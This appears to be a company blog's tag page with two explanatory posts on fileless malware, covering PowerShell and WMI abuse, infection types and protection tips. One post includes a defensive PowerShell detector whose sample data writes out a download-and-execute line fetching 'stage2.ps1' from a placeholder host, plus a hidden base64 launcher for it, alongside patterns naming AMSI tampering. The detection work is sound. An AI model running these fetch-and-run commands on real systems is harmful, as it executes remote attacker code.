Posts Tagged Fileless Malware

How Does Fileless Malware Work?

Fileless malware is malicious software that does not rely on a malicious file written to disk to infect a host. Instead, it abuses applications and utilities that are already present and normally used for legitimate work, and runs its malicious code in the memory of the host. Because little or nothing is written to disk, file-scanning defenses have few artifacts to examine, which makes the infection harder to detect and remove. It still leaves traces in memory, process activity and logs, and that is where detection has to look.

Key Utilities Abused By Fileless Malware:

Attackers who use fileless malware aim to gather a large amount of information in a short time, so they concentrate on a few built-in components that are already trusted on the endpoint. Two that are commonly abused are:

  • PowerShell
  • Windows Management Instrumentation (WMI)

The reasons why attackers choose these systems are:

  • Security tools trust these utilities, which are signed Microsoft components
  • Analysts tend to assume that activity from these utilities is legitimate
  • They provide complete control over an endpoint
  • Most organizations will not disable them because doing so would hinder business IT or DevOps work

Working Of Fileless Malware:

Following are a few scenarios in which fileless malware can use a system's software, applications and protocols to install itself and execute malicious activity:

  • Phishing emails, malicious downloads and links that look legitimate serve as points of entry. Once a user opens them, the payload is loaded directly into the system's memory, which lets the attacker remotely run code and steal confidential data.
  • Malicious code can be injected into applications that are already installed on the system and trusted by the user. Once hijacked, these applications execute the attacker's code while appearing to run normally.
  • Attackers create fake websites that mimic legitimate business pages. When a user visits, the page probes for vulnerabilities in browser plugins such as Flash and exploits them to run malicious code in the browser's memory.

The malware is written directly to the RAM of the infected system and makes no changes on the hard disk. It operates in memory, and its activity ends when the system reboots unless the attacker has added a persistence mechanism, such as a registry entry or a WMI event subscription, that reloads it.
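Because the payload above never touches disk, the place to catch it is the interpreter's own telemetry. The PowerShell below is an added example, not code from the original article: it turns on Script Block Logging, which makes PowerShell record the de-obfuscated text of every script block it compiles as event ID 4104, and then scores those blocks for the download-and-execute and encoded-command patterns that fileless loaders use. The function names, the pattern list and the sample script blocks are this example's own choices; the samples are constructed, not real telemetry.

```powershell
# Added example (not part of the original article): hunting in-memory
# PowerShell abuse with Script Block Logging. Function names and the pattern
# list are this example's own choices. Run from an elevated prompt for the
# registry write and for reading the Operational log on hardened hosts.

# 1. Turn on Script Block Logging (the same key Group Policy sets). PowerShell
#    then records the de-obfuscated text of every script block it compiles as
#    event ID 4104, even when nothing is ever written to disk.
function Enable-ScriptBlockLogging {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 `
        -PropertyType DWord -Force | Out-Null
}

# 2. Patterns common in fileless loaders: download-and-invoke, reflective
#    .NET loading, base64 -EncodedCommand, hidden windows and AMSI tampering.
$SuspiciousPatterns = @(
    'IEX\s*\(', 'Invoke-Expression', 'DownloadString', 'DownloadData',
    'FromBase64String', '-EncodedCommand', '-enc\s', '\[Reflection\.Assembly\]::Load',
    'AmsiUtils', 'amsiInitFailed', '-w(indowstyle)?\s+hidden'
)

# 3. Score one script block's text; returns the list of matching patterns.
function Test-ScriptBlock {
    param([string]$Text)
    $hits = @()
    foreach ($p in $SuspiciousPatterns) {
        if ($Text -match $p) { $hits += $p }   # -match is case-insensitive
    }
    return ,$hits
}

# 4. Decode a -EncodedCommand payload (PowerShell encodes it as UTF-16LE) so
#    the real command can be inspected and scored as well.
function ConvertFrom-EncodedCommand {
    param([string]$Base64)
    return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# 5. Pull 4104 events from the last N hours and report the suspicious ones.
function Get-SuspiciousScriptBlocks {
    param([int]$Hours = 24)
    $filter = @{ LogName   = 'Microsoft-Windows-PowerShell/Operational'
                 Id        = 4104
                 StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = $_.Properties[2].Value          # ScriptBlockText field of 4104
        $hits = Test-ScriptBlock -Text $text
        if ($hits.Count -gt 0) {
            [pscustomobject]@{ Time = $_.TimeCreated; Hits = ($hits -join ','); Text = $text }
        }
    }
}

# Constructed sample script blocks (not real telemetry) showing what is flagged.
$stage2 = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.10/stage2.ps1")'
$samples = @(
    'Get-ChildItem C:\Users | Sort-Object Name',
    $stage2,
    'powershell -nop -w hidden -enc ' +
        [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stage2))
)
foreach ($s in $samples) {
    $hits = Test-ScriptBlock -Text $s
    if ($s -match '-enc\s+(\S+)') {          # also score the decoded payload
        $hits += Test-ScriptBlock -Text (ConvertFrom-EncodedCommand $Matches[1])
    }
    $verdict = if ($hits.Count -gt 0) { 'SUSPECT' } else { 'benign' }
    '{0,-8} {1}' -f $verdict, $s.Substring(0, [Math]::Min(70, $s.Length))
}

# Live hunt once logging is enabled:
# Enable-ScriptBlockLogging
# Get-SuspiciousScriptBlocks -Hours 48 | Format-List
```

The first sample is reported as benign and the other two as suspect; the third is caught twice, once for the `-enc` and hidden-window flags on the launcher and again on the decoded UTF-16LE payload. Script Block Logging is the one control here that defeats the "no file on disk" trick outright, because the text is captured at compile time regardless of how it arrived in memory; pair it with forwarding of the Operational log so the records survive if the host is wiped.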

Defending Against Fileless Malware Attacks:

The effective way to defend against fileless malware attacks is an integrated approach that covers the entire threat lifecycle. A multi-layer defense lets defenders investigate every phase of an attack: before, during and after it.

For more information on fileless malware and tips on preventing cyber-attacks on computer networks, contact Centex Technologies at (254) 213 – 4740.


Understanding Fileless Malware Infections

March 30, 2016

A fileless malware infection is a malicious program written directly to a computer's RAM instead of being stored as a file on the hard drive. The code is usually injected into running processes, and any data it needs to keep is often stored in encrypted form in the registry, which makes the malware difficult to detect and remove. Because it lives in volatile memory, the in-memory component does not survive a reboot unless such a registry entry reloads it; while active, however, a fileless infection can do a great deal of damage.

Fileless malware attacks are mainly aimed at:

  • Avoiding Detection: The malware often eludes intrusion prevention systems and antivirus programs, giving the attackers time to carry out the attack.
  • Gathering Information: Attackers may steal sensitive information stored on the computer, such as financial details, confidential files and login credentials.
  • Escalating Privileges: Exploiting security flaws in the system can give attackers administrative access, from which they can launch further attacks or download more malware.

Types Of Fileless Malware Infections

  • Memory Resident: This type occupies the memory of a legitimate Windows process. It inserts its code into that process's memory and stays dormant until triggered or accessed.
  • Windows Registry: The payload is stored in the Windows registry, which users rarely inspect. The attacker may place malicious code in locations such as the operating system's thumbnail cache and have the entry delete itself once the attack has run.
  • Rootkits: This malware hides its presence by hooking application programming interfaces (APIs) while holding administrator-level access to the infected system. Fileless rootkits are often hidden at the kernel level and can remain active in spite of antivirus scans and system reboots.

Tips To Protect Against Fileless Malware

  • Keep your operating system, internet browser, software and applications up to date by installing the current security patches.
  • Harden the security settings of your web browser.
  • Disable Java, ActiveX and browser extensions that you do not use, and restrict JavaScript and cookies on sites that do not need them.
  • Avoid clicking on suspicious URLs and email attachments from unknown sources.
  • Do not download software packages that insist on installing several bundled applications on your system.
  • Regularly remove unwanted temporary files, cookies and stale registry entries from the computer.
  • Avoid malicious websites and those that use untrustworthy ad networks.

For more tips to keep your computer system protected against fileless malware infections, feel free to contact Centex Technologies at (855) 375 – 9654.
